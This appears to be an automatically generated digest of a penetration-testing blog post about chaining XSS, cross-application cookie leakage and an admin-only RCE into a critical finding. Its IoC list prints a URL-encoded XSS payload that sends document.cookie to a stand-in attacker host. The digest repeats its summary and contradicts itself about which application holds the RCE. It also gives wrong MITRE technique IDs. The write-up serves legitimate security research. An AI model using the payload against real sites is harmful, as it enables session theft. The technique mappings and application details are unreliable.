Summary:
This article discusses how a security consultant uncovered a critical vulnerability by chaining multiple findings across three applications running on the same hostname. Initially rated as informational, a misconfiguration led to administrative access and remote code execution. The case highlights the dangers of seemingly benign vulnerabilities when combined.
#WebSecurity #ExploitChain #VulnerabilityAssessment
This article discusses how a security consultant uncovered a critical vulnerability by chaining multiple findings across three applications running on the same hostname. Initially rated as informational, a misconfiguration led to administrative access and remote code execution. The case highlights the dangers of seemingly benign vulnerabilities when combined.
#WebSecurity #ExploitChain #VulnerabilityAssessment
Keypoints:
- Security consultant identified vulnerabilities across three applications running on the same hostname but different ports.
- Application A was vulnerable to Reflected XSS but couldn’t be exploited for session hijacking due to HttpOnly flags on cookies.
- Application B had a high-severity RCE vulnerability requiring admin access and exposed sensitive Spring Boot actuator endpoints.
- Application C supported both Authorization Header and session-based authentication, making it a target for session hijacking.
- Weak Configuration – Cross-Application Cookie Exposure was identified, allowing cookies to be leaked between applications.
- Session hijacking was possible due to the absence of the HttpOnly flag on Application C’s JSESSIONID cookie.
- Chaining vulnerabilities escalated the severity from informational to critical, allowing exploitation of RCE without admin privileges.
- The engagement demonstrated the risk of misconfigurations leading to significant security threats.
MITRE Techniques:
- Exploitation for Client Execution (T1203): Leveraged XSS vulnerability in Application A to hijack session cookie from Application C.
- Remote Code Execution (T1203): Exploited RCE vulnerability in Application C after gaining administrative access through session hijacking.
- Cross-Site Scripting (T1068): Used XSS in Application A to access sensitive cookies from Application C.
IoC:
- [domain] example[.]com
- [url] https://example[.]com:1111?id=
setTimeout%28%28%29%3d>%7bfetch%28%27https%3a%2f%2fmy-malicious-server.com%3fcookie%3d%27%2bdocument%2ecookie%29%2ethen%28%29%7d%2c5000%29 - [url] https://my-malicious-server.com
Full Research: https://www.netspi.com/blog/technical-blog/web-application-pentesting/uncovering-a-critical-vulnerability-through-chained-findings/